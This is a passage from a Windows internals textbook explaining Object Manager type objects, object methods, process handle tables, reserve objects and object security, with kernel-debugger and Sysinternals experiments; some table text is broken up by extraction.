[+0x040] CloseProcedure : 0xfffff8047F087a90 [Type:
void (__cdecl*)
(_EPROCESS *,void
*,unsigned __int64,unsigned __int64)]
[+0x048] DeleteProcedure : 0xfffff8047f02f030 [Type:
void (__cdecl*)(void *)]
[+0x050] ParseProcedure : 0x0 [Type: long (__cdecl*)
(void *,void *,_ACCESS_STATE *,
char,unsigned
long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE *,void * *)]
[+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)
(void *,void *,_ACCESS_STATE *,
char,unsigned
long,_UNICODE_STRING *,_UNICODE_STRING *,void *,
_SECURITY_QUALITY_OF_SERVICE
*,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
[+0x058] SecurityProcedure : 0xfffff8047eff57b0 [Type:
long (__cdecl*)
(void *,_SECURITY_OPERATION_CODE,unsigned
long *,void *,unsigned long *,
void *
*,_POOL_TYPE,_GENERIC_MAPPING *,char)]
[+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)
(void *,unsigned char,_
OBJECT_NAME_INFORMATION
*,unsigned long,unsigned long *,char)]
[+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char
(__cdecl*)(_EPROCESS *,
void *,void *,char)]
[+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
[+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned
short]
[+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned
short]
Type objects can’t be manipulated from user mode because the Object
Manager supplies no services for them. However, some of the attributes they
define are visible through certain native services and through Windows API
routines. The information stored in the type initializers is described in Table
8-22.
Table 8-22 Type initializer fields
A
tt
ri
b
ut
e
Purpose
T
y
pe
na
m
e
The name for objects of this type (Process, Event, ALPC Port, and
so on).
P
o
ol
ty
pe
Indicates whether objects of this type should be allocated from
paged or nonpaged memory.
D
ef
au
lt
q
u
Default paged and non-paged pool values to charge to process
quotas.
ot
a
ch
ar
ge
s
V
al
id
ac
ce
ss
m
as
k
The types of access a thread can request when opening a handle to
an object of this type (read, write, terminate, suspend, and so on).
G
en
er
ic
ac
ce
ss
ri
g
ht
s
m
ap
pi
n
g
A mapping between the four generic access rights (read, write,
execute, and all) to the type-specific access rights.
R
et
Access rights that can never be removed by any third-party Object
Manager callbacks (part of the callback list described earlier).
ai
n
ac
ce
ss
Fl
ag
s
Indicate whether objects must never have names (such as process
objects), whether their names are case-sensitive, whether they
require a security descriptor, whether they should be cache aligned
(requiring a padding subheader), whether they support object-
filtering callbacks, and whether a handle database (handle
information subheader) and/or a type-list linkage (creator
information subheader) should be maintained. The use default
object flag also defines the behavior for the default object field
shown later in this table. Finally, the use extended parameters flag
enables usage of the extended parse procedure method, described
later.
O
bj
ec
t
ty
pe
co
de
Used to describe the type of object this is (versus comparing with a
well-known name value). File objects set this to 1, synchronization
objects set this to 2, and thread objects set this to 4. This field is
also used by ALPC to store handle attribute information associated
with a message.
In
va
li
d
at
tri
b
ut
es
Specifies object attribute flags (shown earlier in Table 8-20) that
are invalid for this object type.
D
ef
au
lt
o
bj
ec
t
Specifies the internal Object Manager event that should be used
during waits for this object, if the object type creator requested one.
Note that certain objects, such as File objects and ALPC port
objects already contain embedded dispatcher objects; in this case,
this field is a flag that indicates that the following wait object
mask/offset/pointer fields should be used instead.
W
ai
t
o
bj
ec
t
fl
ag
s,
p
oi
nt
er
,
of
fs
et
Allows the Object Manager to generically locate the underlying
kernel dispatcher object that should be used for synchronization
when one of the generic wait services shown earlier
(WaitForSingleObject, etc.) is called on the object.
M
et
h
o
ds
One or more routines that the Object Manager calls automatically
at certain points in an object’s lifetime or in response to certain
user-mode calls.
Synchronization, one of the attributes visible to Windows applications,
refers to a thread’s ability to synchronize its execution by waiting for an
object to change from one state to another. A thread can synchronize with
executive job, process, thread, file, event, semaphore, mutex, timer, and
many other different kinds of objects. Yet, other executive objects don’t
support synchronization. An object’s ability to support synchronization is
based on three possibilities:
■ The executive object is a wrapper for a dispatcher object and contains
a dispatcher header, a kernel structure that is covered in the section
“Low-IRQL synchronization” later in this chapter.
■ The creator of the object type requested a default object, and the
Object Manager provided one.
■ The executive object has an embedded dispatcher object, such as an
event somewhere inside the object body, and the object’s owner
supplied its offset (or pointer) to the Object Manager when registering
the object type (described in Table 8-14).
Object methods
The last attribute in Table 8-22, methods, comprises a set of internal routines
that are similar to C++ constructors and destructors—that is, routines that are
automatically called when an object is created or destroyed. The Object
Manager extends this idea by calling an object method in other situations as
well, such as when someone opens or closes a handle to an object or when
someone attempts to change the protection on an object. Some object types
specify methods whereas others don’t, depending on how the object type is to
be used.
When an executive component creates a new object type, it can register
one or more methods with the Object Manager. Thereafter, the Object
Manager calls the methods at well-defined points in the lifetime of objects of
that type, usually when an object is created, deleted, or modified in some
way. The methods that the Object Manager supports are listed in Table 8-23.
Table 8-23 Object methods
Meth
od
When Method Is Called
Open
When an object handle is created, opened, duplicated, or
inherited
Close
When an object handle is closed
Delet
e
Before the Object Manager deletes an object
Query
name
When a thread requests the name of an object
Parse
When the Object Manager is searching for an object name
Dump
Not used
Okay
to
close
When the Object Manager is instructed to close a handle
Secur
ity
When a process reads or changes the protection of an object,
such as a file, that exists in a secondary object namespace
One of the reasons for these object methods is to address the fact that, as
you’ve seen, certain object operations are generic (close, duplicate, security,
and so on). Fully generalizing these generic routines would have required the
designers of the Object Manager to anticipate all object types. Not only
would this add extreme complexity to the kernel, but the routines to create an
object type are actually exported by the kernel! Because this enables external
kernel components to create their own object types, the kernel would be
unable to anticipate potential custom behaviors. Although this functionality is
not documented for driver developers, it is internally used by Pcw.sys,
Dxgkrnl.sys, Win32k.sys, FltMgr.sys, and others, to define WindowStation,
Desktop, PcwObject, Dxgk*, FilterCommunication/ConnectionPort,
NdisCmState, and other objects. Through object-method extensibility, these
drivers can define routines for handling operations such as delete and query.
Another reason for these methods is simply to allow a sort of virtual
constructor and destructor mechanism in terms of managing an object’s
lifetime. This allows an underlying component to perform additional actions
during handle creation and closure, as well as during object destruction. They
even allow prohibiting handle closure and creation, when such actions are
undesired—for example, the protected process mechanism described in Part
1, Chapter 3, leverages a custom handle creation method to prevent less
protected processes from opening handles to more protected ones. These
methods also provide visibility into internal Object Manager APIs such as
duplication and inheritance, which are delivered through generic services.
Finally, because these methods also override the parse and query name
functionality, they can be used to implement a secondary namespace outside
of the purview of the Object Manager. In fact, this is how File and Key
objects work—their namespace is internally managed by the file system
driver and the configuration manager, and the Object Manager only ever sees
the \REGISTRY and \Device\HarddiskVolumeN object. A little later, we’ll
provide details and examples for each of these methods.
The Object Manager only calls routines if their pointer is not set to NULL
in the type initializer—with one exception: the security routine, which
defaults to SeDefaultObjectMethod. This routine does not need to know the
internal structure of the object because it deals only with the security
descriptor for the object, and you’ve seen that the pointer to the security
descriptor is stored in the generic object header, not inside the object body.
However, if an object does require its own additional security checks, it can
define a custom security routine, which again comes into play with File and
Key objects that store security information in a way that’s managed by the
file system or configuration manager directly.
The Object Manager calls the open method whenever it creates a handle to
an object, which it does when an object is created, opened, duplicated, or
inherited. For example, the WindowStation and Desktop objects provide an
open method. Indeed, the WindowStation object type requires an open
method so that Win32k.sys can share a piece of memory with the process that
serves as a desktop-related memory pool.
An example of the use of a close method occurs in the I/O system. The I/O
manager registers a close method for the file object type, and the Object
Manager calls the close method each time it closes a file object handle. This
close method checks whether the process that is closing the file handle owns
any outstanding locks on the file and, if so, removes them. Checking for file
locks isn’t something the Object Manager itself can or should do.
The Object Manager calls a delete method, if one is registered, before it
deletes a temporary object from memory. The memory manager, for
example, registers a delete method for the section object type that frees the
physical pages being used by the section. It also verifies that any internal data
structures the memory manager has allocated for a section are deleted before
the section object is deleted. Once again, the Object Manager can’t do this
work because it knows nothing about the internal workings of the memory
manager. Delete methods for other types of objects perform similar
functions.
The parse method (and similarly, the query name method) allows the
Object Manager to relinquish control of finding an object to a secondary
Object Manager if it finds an object that exists outside the Object Manager
namespace. When the Object Manager looks up an object name, it suspends
its search when it encounters an object in the path that has an associated
parse method. The Object Manager calls the parse method, passing to it the
remainder of the object name it is looking for. There are two namespaces in
Windows in addition to the Object Manager’s: the registry namespace, which
the configuration manager implements, and the file system namespace, which
the I/O manager implements with the aid of file system drivers. (See Chapter
10 for more information on the configuration manager and Chapter 6 in Part
1 for more details about the I/O manager and file system drivers.)
For example, when a process opens a handle to the object named
\Device\HarddiskVolume1\docs\resume.doc, the Object Manager traverses
its name tree until it reaches the device object named HarddiskVolume1. It
sees that a parse method is associated with this object, and it calls the
method, passing to it the rest of the object name it was searching for—in this
case, the string docs\resume.doc. The parse method for device objects is an
I/O routine because the I/O manager defines the device object type and
registers a parse method for it. The I/O manager’s parse routine takes the
name string and passes it to the appropriate file system, which finds the file
on the disk and opens it.
The security method, which the I/O system also uses, is similar to the
parse method. It is called whenever a thread tries to query or change the
security information protecting a file. This information is different for files
than for other objects because security information is stored in the file itself
rather than in memory. The I/O system therefore must be called to find the
security information and read or change it.
Finally, the okay-to-close method is used as an additional layer of
protection around the malicious—or incorrect—closing of handles being
used for system purposes. For example, each process has a handle to the
Desktop object or objects on which its thread or threads have windows
visible. Under the standard security model, it is possible for those threads to
close their handles to their desktops because the process has full control of its
own objects. In this scenario, the threads end up without a desktop associated
with them—a violation of the windowing model. Win32k.sys registers an
okay-to-close routine for the Desktop and WindowStation objects to prevent
this behavior.
Object handles and the process handle table
When a process creates or opens an object by name, it receives a handle that
represents its access to the object. Referring to an object by its handle is
faster than using its name because the Object Manager can skip the name
lookup and find the object directly. As briefly referenced earlier, processes
can also acquire handles to objects by inheriting handles at process creation
time (if the creator specifies the inherit handle flag on the CreateProcess call
and the handle was marked as inheritable, either at the time it was created or
afterward by using the Windows SetHandleInformation function) or by
receiving a duplicated handle from another process. (See the Windows
DuplicateHandle function.)
All user-mode processes must own a handle to an object before their
threads can use the object. Using handles to manipulate system resources
isn’t a new idea. C and C++ run-time libraries, for example, return handles to
opened files. Handles serve as indirect pointers to system resources; this
indirection keeps application programs from fiddling directly with system
data structures.
Object handles provide additional benefits. First, except for what they refer
to, there is no difference between a file handle, an event handle, and a
process handle. This similarity provides a consistent interface to reference
objects, regardless of their type. Second, the Object Manager has the
exclusive right to create handles and to locate an object that a handle refers
to. This means that the Object Manager can scrutinize every user-mode
action that affects an object to see whether the security profile of the caller
allows the operation requested on the object in question.
Note
Executive components and device drivers can access objects directly
because they are running in kernel mode and therefore have access to the
object structures in system memory. However, they must declare their
usage of the object by incrementing the reference count so that the object
won’t be deallocated while it’s still being used. (See the section “Object
retention” later in this chapter for more details.) To successfully make use
of this object, however, device drivers need to know the internal structure
definition of the object, and this is not provided for most objects. Instead,
device drivers are encouraged to use the appropriate kernel APIs to
modify or read information from the object. For example, although device
drivers can get a pointer to the Process object (EPROCESS), the structure
is opaque, and the Ps* APIs must be used instead. For other objects, the
type itself is opaque (such as most executive objects that wrap a
dispatcher object—for example, events or mutexes). For these objects,
drivers must use the same system calls that user-mode applications end up
calling (such as ZwCreateEvent) and use handles instead of object
pointers.
EXPERIMENT: Viewing open handles
Run Process Explorer and make sure the lower pane is enabled and
configured to show open handles. (Click on View, Lower Pane
View, and then Handles.) Then open a command prompt and view
the handle table for the new Cmd.exe process. You should see an
open file handle to the current directory. For example, assuming the
current directory is C:\Users\Public, Process Explorer shows the
following:
Now pause Process Explorer by pressing the spacebar or
selecting View, Update Speed and choosing Pause. Then change
the current directory with the cd command and press F5 to refresh
the display. You will see in Process Explorer that the handle to the
previous current directory is closed, and a new handle is opened to
the new current directory. The previous handle is highlighted in
red, and the new handle is highlighted in green.
Process Explorer’s differences-highlighting feature makes it easy
to see changes in the handle table. For example, if a process is
leaking handles, viewing the handle table with Process Explorer
can quickly show what handle or handles are being opened but not
closed. (Typically, you see a long list of handles to the same
object.) This information can help the programmer find the handle
leak.
Resource Monitor also shows open handles to named handles for
the processes you select by checking the boxes next to their names.
The figure shows the command prompt’s open handles:
You can also display the open handle table by using the
command-line Handle tool from Sysinternals. For example, note
the following partial output of Handle when examining the file
object handles located in the handle table for a Cmd.exe process
before and after changing the directory. By default, Handle filters
out non-file handles unless the –a switch is used, which displays all
the handles in the process, similar to Process Explorer.
Click here to view code image
C:\Users\aione>\sysint\handle.exe -p 8768 -a users
Nthandle v4.22 - Handle viewer
Copyright (C) 1997-2019 Mark Russinovich
Sysinternals - www.sysinternals.com
cmd.exe pid: 8768 type: File 150:
C:\Users\Public
An object handle is an index into a process-specific handle table, pointed
to by the executive process (EPROCESS) block (described in Chapter 3 of
Part 1). The index is multiplied by 4 (shifted 2 bits) to make room for per-
handle bits that are used by certain API behaviors—for example, inhibiting
notifications on I/O completion ports or changing how process debugging
works. Therefore, the first handle index is 4, the second 8, and so on. Using
handle 5, 6, or 7 simply redirects to the same object as handle 4, while 9, 10,
and 11 would reference the same object as handle 8.
A process’s handle table contains pointers to all the objects that the
process currently has opened a handle to, and handle values are aggressively
reused, such that the next new handle index will reuse an existing closed
handle index if possible. Handle tables, as shown in Figure 8-33, are
implemented as a three-level scheme, similar to the way that the legacy x86
memory management unit implemented virtual-to-physical address
translation but with a cap of 24 bits for compatibility reasons, resulting in a
maximum of 16,777,215 (224-1) handles per process. Figure 8-34 describes
instead the handle table entry layout on Windows. To save on kernel memory
costs, only the lowest-level handle table is allocated on process creation—the
other levels are created as needed. The subhandle table consists of as many
entries as will fit in a page minus one entry that is used for handle auditing.
For example, for 64-bit systems, a page is 4096 bytes, divided by the size of
a handle table entry (16 bytes), which is 256, minus 1, which is a total of 255
entries in the lowest-level handle table. The mid-level handle table contains a
full page of pointers to subhandle tables, so the number of subhandle tables
depends on the size of the page and the size of a pointer for the platform.
Again using 64-bit systems as an example, this gives us 4096/8, or 512
entries. Due to the cap of 24 bits, only 32 entries are allowed in the top-level
pointer table. If we multiply things together, we arrive at 32*512*255 or
16,711,680 handles.
Figure 8-33 Windows process handle table architecture.
Figure 8-34 Structure of a 32-bit handle table entry.
EXPERIMENT: Creating the maximum number of
handles
The test program Testlimit from Sysinternals has an option to open
handles to an object until it cannot open any more handles. You can
use this to see how many handles can be created in a single process
on your system. Because handle tables are allocated from paged
pool, you might run out of paged pool before you hit the maximum
number of handles that can be created in a single process. To see
how many handles you can create on your system, follow these
steps:
1.
Download the Testlimit executable file corresponding to the
32-bit/64-bit Windows you need from
https://docs.microsoft.com/en-
us/sysinternals/downloads/testlimit.
2.
Run Process Explorer, click View, and then click System
Information. Then click the Memory tab. Notice the
current and maximum size of paged pool. (To display the
maximum pool size values, Process Explorer must be
configured properly to access the symbols for the kernel
image, Ntoskrnl.exe.) Leave this system information display
running so that you can see pool utilization when you run
the Testlimit program.
3.
Open a command prompt.
4.
Run the Testlimit program with the –h switch (do this by
typing testlimit –h). When Testlimit fails to open a new
handle, it displays the total number of handles it was able to
create. If the number is less than approximately 16 million,
you are probably running out of paged pool before hitting
the theoretical per-process handle limit.
5.
Close the Command Prompt window; doing this kills the
Testlimit process, thus closing all the open handles.
As shown in Figure 8-34, on 32-bit systems, each handle entry consists of
a structure with two 32-bit members: a pointer to the object (with three flags
consuming the bottom 3 bits, due to the fact that all objects are 8-byte
aligned, and these bits can be assumed to be 0), and the granted access mask
(out of which only 25 bits are needed, since generic rights are never stored in
the handle entry) combined with two more flags and the reference usage
count, which we describe shortly.
On 64-bit systems, the same basic pieces of data are present but are
encoded differently. For example, 44 bits are now needed to encode the
object pointer (assuming a processor with four-level paging and 48-bits of
virtual memory), since objects are 16-byte aligned, and thus the bottom four
bits can now be assumed to be 0. This now allows encoding the “Protect
from close” flag as part of the original three flags that were used on 32-bit
systems as shown earlier, for a total of four flags. Another change is that the
reference usage count is encoded in the remaining 16 bits next to the pointer,
instead of next to the access mask. Finally, the “No rights upgrade” flag
remains next to the access mask, but the remaining 6 bits are spare, and there
are still 32-bits of alignment that are also currently spare, for a total of 16
bytes. And on LA57 systems with five levels of paging, things take yet
another turn, where the pointer must now be 53 bits, reducing the usage
count bits to only 7.
Since we mentioned a variety of flags, let’s see what these do. First, the
first flag is a lock bit, indicating whether the entry is currently in use.
Technically, it’s called “unlocked,” meaning that you should expect the
bottom bit to normally be set. The second flag is the inheritance designation
—that is, it indicates whether processes created by this process will get a
copy of this handle in their handle tables. As already noted, handle
inheritance can be specified on handle creation or later with the
SetHandleInformation function. The third flag indicates whether closing the
object should generate an audit message. (This flag isn’t exposed to
Windows—the Object Manager uses it internally.) Next, the “Protect from
close” bit indicates whether the caller is allowed to close this handle. (This
flag can also be set with the SetHandleInformation function.) Finally, the
“No rights upgrade” bit indicates whether access rights should be upgraded if
the handle is duplicated to a process with higher privileges.
These last four flags are exposed to drivers through the
OBJECT_HANDLE_INFORMATION structure that is passed in to APIs such
as ObReferenceObjectByHandle, and map to OBJ_INHERIT (0x2),
OBJ_AUDIT_OBJECT_CLOSE (0x4), OBJ_PROTECT_CLOSE (0x1), and
OBJ_NO_RIGHTS_UPGRADE (0x8), which happen to match exactly with
“holes” in the earlier OBJ_ attribute definitions that can be set when creating
an object. As such, the object attributes, at runtime, end up encoding both
specific behaviors of the object, as well as specific behaviors of a given
handle to said object.
Finally, we mentioned the existence of a reference usage count in both the
encoding of the pointer count field of the object’s header, as well as in the
handle table entry. This handy feature encodes a cached number (based on
the number of available bits) of preexisting references as part of each handle
entry and then adds up the usage counts of all processes that have a handle to
the object into the pointer count of the object’s header. As such, the pointer
count is the number of handles, kernel references through
ObReferenceObject, and the number of cached references for each handle.
Each time a process finishes to use an object, by dereferencing one of its
handles—basically by calling any Windows API that takes a handle as input
and ends up converting it into an object—the cached number of references is
dropped, which is to say that the usage count decreases by 1, until it reaches
0, at which point it is no longer tracked. This allows one to infer exactly the
number of times a given object has been utilized/accessed/managed through a
specific process’s handle.
The debugger command !trueref, when executed with the -v flag, uses this
feature as a way to show each handle referencing an object and exactly how
many times it was used (if you count the number of consumed/dropped usage
counts). In one of the next experiments, you’ll use this command to gain
additional insight into an object’s usage.
System components and device drivers often need to open handles to
objects that user-mode applications shouldn’t have access to or that simply
shouldn’t be tied to a specific process to begin with. This is done by creating
handles in the kernel handle table (referenced internally with the name
ObpKernelHandleTable), which is associated with the System process. The
handles in this table are accessible only from kernel mode and in any process
context. This means that a kernel-mode function can reference the handle in
any process context with no performance impact.
The Object Manager recognizes references to handles from the kernel
handle table when the high bit of the handle is set—that is, when references
to kernel-handle-table handles have values greater than 0x80000000 on 32-
bit systems, or 0xFFFFFFFF80000000 on 64-bit systems (since handles are
defined as pointers from a data type perspective, the compiler forces sign-
extension).
The kernel handle table also serves as the handle table for the System and
minimal processes, and as such, all handles created by the System process
(such as code running in system threads) are implicitly kernel handles
because the ObpKernelHandleTable symbol is set the as ObjectTable of the
EPROCESS structure for these processes. Theoretically, this means that a
sufficiently privileged user-mode process could use the DuplicateHandle API
to extract a kernel handle out into user mode, but this attack has been
mitigated since Windows Vista with the introduction of protected processes,
which were described in Part 1.
Furthermore, as a security mitigation, any handle created by a kernel
driver, with the previous mode set to KernelMode, is automatically turned
into a kernel handle in recent versions of Windows to prevent handles from
inadvertently leaking to user space applications.
EXPERIMENT: Viewing the handle table with the
kernel debugger
The !handle command in the kernel debugger takes three
arguments:
Click here to view code image
!handle <handle index> <flags> <processid>
The handle index identifies the handle entry in the handle table.
(Zero means “display all handles.”) The first handle is index 4, the
second 8, and so on. For example, typing !handle 4 shows the first
handle for the current process.
The flags you can specify are a bitmask, where bit 0 means
“display only the information in the handle entry,” bit 1 means
“display free handles (not just used handles),” and bit 2 means
“display information about the object that the handle refers to.”
The following command displays full details about the handle table
for process ID 0x1540:
Click here to view code image
lkd> !handle 0 7 1540
PROCESS ffff898f239ac440
SessionId: 0 Cid: 1540 Peb: 1ae33d000 ParentCid:
03c0
DirBase: 211e1d000 ObjectTable: ffffc704b46dbd40
HandleCount: 641.
Image: com.docker.service
Handle table at ffffc704b46dbd40 with 641 entries in use
0004: Object: ffff898f239589e0 GrantedAccess: 001f0003
(Protected) (Inherit) Entry: ffffc704b45ff010
Object: ffff898f239589e0 Type: (ffff898f032e2560) Event
ObjectHeader: ffff898f239589b0 (new version)
HandleCount: 1 PointerCount: 32766
0008: Object: ffff898f23869770 GrantedAccess: 00000804
(Audit) Entry: ffffc704b45ff020
Object: ffff898f23869770 Type: (ffff898f033f7220)
EtwRegistration
ObjectHeader: ffff898f23869740 (new version)
HandleCount: 1 PointerCount: 32764
Instead of having to remember what all these bits mean, and
convert process IDs to hexadecimal, you can also use the debugger
data model to access handles through the Io.Handles namespace of
a process. For example, typing dx @$curprocess.Io.Handles[4]
will show the first handle for the current process, including the
access rights and name, while the following command displays full
details about the handles in PID 5440 (that is, 0x1540):
Click here to view code image
lkd> dx -r2 @$cursession.Processes[5440].Io.Handles
@$cursession.Processes[5440].Io.Handles
[0x4]
Handle : 0x4
Type : Event
GrantedAccess : Delete | ReadControl | WriteDac |
WriteOwner | Synch | QueryState | ModifyState
Object [Type: _OBJECT_HEADER]
[0x8]
Handle : 0x8
Type : EtwRegistration
GrantedAccess
Object [Type: _OBJECT_HEADER]
[0xc]
Handle : 0xc
Type : Event
GrantedAccess : Delete | ReadControl | WriteDac |
WriteOwner | Synch | QueryState | ModifyState
Object [Type: _OBJECT_HEADER]
You can use the debugger data model with a LINQ predicate to
perform more interesting searches, such as looking for named
section object mappings that are Read/Write:
Click here to view code image
lkd> dx @$cursession.Processes[5440].Io.Handles.Where(h =>
(h.Type == "Section") && (h.GrantedAccess.MapWrite) &&
(h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
@$cursession.Processes[5440].Io.Handles.Where(h => (h.Type
== "Section") && (h.GrantedAccess.MapWrite) &&
(h.GrantedAccess.MapRead)).Select(h => h.ObjectName)
[0x16c] : "Cor_Private_IPCBlock_v4_5440"
[0x170] : "Cor_SxSPublic_IPCBlock"
[0x354] : "windows_shell_global_counters"
[0x3b8] : "UrlZonesSM_DESKTOP-SVVLOTP$"
[0x680] : "NLS_CodePage_1252_3_2_0_0"
EXPERIMENT: Searching for open files with the
kernel debugger
Although you can use Process Hacker, Process Explorer, Handle,
and the OpenFiles.exe utility to search for open file handles, these
tools are not available when looking at a crash dump or analyzing a
system remotely. You can instead use the !devhandles command to
search for handles opened to files on a specific volume. (See
Chapter 11 for more information on devices, files, and volumes.)
1.
First you need to pick the drive letter you are interested in
and obtain the pointer to its Device object. You can use the
!object command as shown here:
Click here to view code image
lkd> !object \Global??\C:
Object: ffffc704ae684970 Type: (ffff898f03295a60)
SymbolicLink
ObjectHeader: ffffc704ae684940 (new version)
HandleCount: 0 PointerCount: 1
Directory Object: ffffc704ade04ca0 Name: C:
Flags: 00000000 ( Local )
Target String is '\Device\HarddiskVolume3'
Drive Letter Index is 3 (C:)
2.
Next, use the !object command to get the Device object of
the target volume name:
Click here to view code image
1: kd> !object \Device\HarddiskVolume1
Object: FFFF898F0820D8F0 Type: (fffffa8000ca0750)
Device
3.
Now you can use the pointer of the Device object with the
!devhandles command. Each object shown points to a file:
Click here to view code image
lkd> !devhandles 0xFFFF898F0820D8F0
Checking handle table for process 0xffff898f0327d300
Kernel handle table at ffffc704ade05580 with 7047
entries in use
PROCESS ffff898f0327d300
SessionId: none Cid: 0004 Peb: 00000000
ParentCid: 0000
DirBase: 001ad000 ObjectTable: ffffc704ade05580
HandleCount: 7023.
Image: System
019c: Object: ffff898F080836a0 GrantedAccess:
0012019f (Protected) (Inherit) (Audit) Entry:
ffffc704ade28670
Object: ffff898F080836a0 Type: (ffff898f032f9820)
File
ObjectHeader: ffff898F08083670 (new version)
HandleCount: 1 PointerCount: 32767
Directory Object: 00000000 Name:
\$Extend\$RmMetadata\$TxfLog\
$TxfLog.blf
{HarddiskVolume4}
Although this extension works just fine, you probably noticed
that it took about 30 seconds to a minute to begin seeing the first
few handles. Instead, you can use the debugger data model to
achieve the same effect with a LINQ predicate, which instantly
starts returning results:
Click here to view code image
lkd> dx -r2 @$cursession.Processes.Select(p =>
p.Io.Handles.Where(h =>
h.Type == "File").Where(f =>
f.Object.UnderlyingObject.DeviceObject ==
(nt!_DEVICE_OBJECT*)0xFFFF898F0820D8F0).Select(f =>
f.Object.UnderlyingObject.FileName))
@$cursession.Processes.Select(p => p.Io.Handles.Where(h =>
h.Type == "File").
Where(f => f.Object.UnderlyingObject.DeviceObject ==
(nt!_DEVICE_OBJECT*)
0xFFFF898F0820D8F0).Select(f =>
f.Object.UnderlyingObject.FileName))
[0x0]
[0x19c] : "\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf"
[Type: _UNICODE_STRING]
[0x2dc] :
"\$Extend\$RmMetadata\$Txf:$I30:$INDEX_ALLOCATION" [Type:
_UNICODE_STRING]
[0x2e0] :
"\$Extend\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000
000002"
[Type: _UNICODE_STRING]
Reserve Objects
Because objects represent anything from events to files to interprocess
messages, the ability for applications and kernel code to create objects is
essential to the normal and desired runtime behavior of any piece of
Windows code. If an object allocation fails, this usually causes anything from
loss of functionality (the process cannot open a file) to data loss or crashes
(the process cannot allocate a synchronization object). Worse, in certain
situations, the reporting of errors that led to object creation failure might
themselves require new objects to be allocated. Windows implements two
special reserve objects to deal with such situations: the User APC reserve
object and the I/O Completion packet reserve object. Note that the reserve-
object mechanism is fully extensible, and future versions of Windows might
add other reserve object types—from a broad view, the reserve object is a
mechanism enabling any kernel-mode data structure to be wrapped as an
object (with an associated handle, name, and security) for later use.
As was discussed earlier in this chapter, APCs are used for operations such
as suspension, termination, and I/O completion, as well as communication
between user-mode applications that want to provide asynchronous
callbacks. When a user-mode application requests a User APC to be targeted
to another thread, it uses the QueueUserApc API in Kernelbase.dll, which
calls the NtQueueApcThread system call. In the kernel, this system call
attempts to allocate a piece of paged pool in which to store the KAPC control
object structure associated with an APC. In low-memory situations, this
operation fails, preventing the delivery of the APC, which, depending on
what the APC was used for, could cause loss of data or functionality.
To prevent this, the user-mode application, can, on startup, use the
NtAllocateReserveObject system call to request the kernel to preallocate the
KAPC structure. Then the application uses a different system call,
NtQueueApcThreadEx, that contains an extra parameter that is used to store
the handle to the reserve object. Instead of allocating a new structure, the
kernel attempts to acquire the reserve object (by setting its InUse bit to true)
and uses it until the KAPC object is not needed anymore, at which point the
reserve object is released back to the system. Currently, to prevent
mismanagement of system resources by third-party developers, the reserve
object API is available only internally through system calls for operating
system components. For example, the RPC library uses reserved APC objects
to guarantee that asynchronous callbacks will still be able to return in low-
memory situations.
A similar scenario can occur when applications need failure-free delivery
of an I/O completion port message or packet. Typically, packets are sent with
the PostQueuedCompletionStatus API in Kernelbase.dll, which calls the
NtSetIoCompletion API. Like the user APC, the kernel must allocate an I/O
manager structure to contain the completion-packet information, and if this
allocation fails, the packet cannot be created. With reserve objects, the
application can use the NtAllocateReserveObject API on startup to have the
kernel preallocate the I/O completion packet, and the NtSetIoCompletionEx
system call can be used to supply a handle to this reserve object,
guaranteeing a successful path. Just like User APC reserve objects, this
functionality is reserved for system components and is used both by the RPC
library and the Windows Peer-To-Peer BranchCache service to guarantee
completion of asynchronous I/O operations.
Object security
When you open a file, you must specify whether you intend to read or to
write. If you try to write to a file that is open for read access, you get an error.
Likewise, in the executive, when a process creates an object or opens a
handle to an existing object, the process must specify a set of desired access
rights—that is, what it wants to do with the object. It can request either a set
of standard access rights (such as read, write, and execute) that apply to all
object types or specific access rights that vary depending on the object type.
For example, the process can request delete access or append access to a file
object. Similarly, it might require the ability to suspend or terminate a thread
object.
When a process opens a handle to an object, the Object Manager calls the
security reference monitor, the kernel-mode portion of the security system,
sending it the process’s set of desired access rights. The security reference
monitor checks whether the object’s security descriptor permits the type of
access the process is requesting. If it does, the reference monitor returns a set
of granted access rights that the process is allowed, and the Object Manager
stores them in the object handle it creates. How the security system
determines who gets access to which objects is explored in Chapter 7 of Part
1.
Thereafter, whenever the process’s threads use the handle through a
service call, the Object Manager can quickly check whether the set of granted
access rights stored in the handle corresponds to the usage implied by the
object service the threads have called. For example, if the caller asked for
read access to a section object but then calls a service to write to it, the
service fails.
EXPERIMENT: Looking at object security
You can look at the various permissions on an object by using
either Process Hacker, Process Explorer, WinObj, WinObjEx64, or
AccessChk, which are all tools from Sysinternals or open-source
tools available on GitHub. Let’s look at different ways you can
display the access control list (ACL) for an object:
■ You can use WinObj or WinObjEx64 to navigate to any
object on the system, including object directories, right-
click the object, and select Properties. For example, select
the BaseNamedObjects directory, select Properties, and
click the Security tab. You should see a dialog box like the
one shown next. Because WinObjEx64 supports a wider
variety of object types, you’ll be able to use this dialog on a
larger set of system resources.
By examining the settings in the dialog box, you can see that the
Everyone group doesn’t have delete access to the directory, for
example, but the SYSTEM account does (because this is where
session 0 services with SYSTEM privileges will store their
objects).
■ Instead of using WinObj or WinObjEx64, you can view the
handle table of a process using Process Explorer, as shown
in the experiment “Viewing open handles” earlier in this
chapter, or using Process Hacker, which has a similar view.
Look at the handle table for the Explorer.exe process. You
should notice a Directory object handle to the
\Sessions\n\BaseNamedObjects directory (where n is an
arbitrary session number defined at boot time. We describe
the per-session namespace shortly.) You can double-click
the object handle and then click the Security tab and see a
similar dialog box (with more users and rights granted).
■ Finally, you can use AccessChk to query the security
information of any object by using the –o switch as shown
in the following output. Note that using AccessChk will
also show you the integrity level of the object. (See Chapter
7 of Part 1, for more information on integrity levels and the
security reference monitor.)
Click here to view code image
C:\sysint>accesschk -o \Sessions\1\BaseNamedObjects
Accesschk v6.13 - Reports effective permissions for
securable objects
Copyright (C) 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
\Sessions\1\BaseNamedObjects
Type: Directory
RW Window Manager\DWM-1
RW NT AUTHORITY\SYSTEM
RW DESKTOP-SVVLOTP\aione
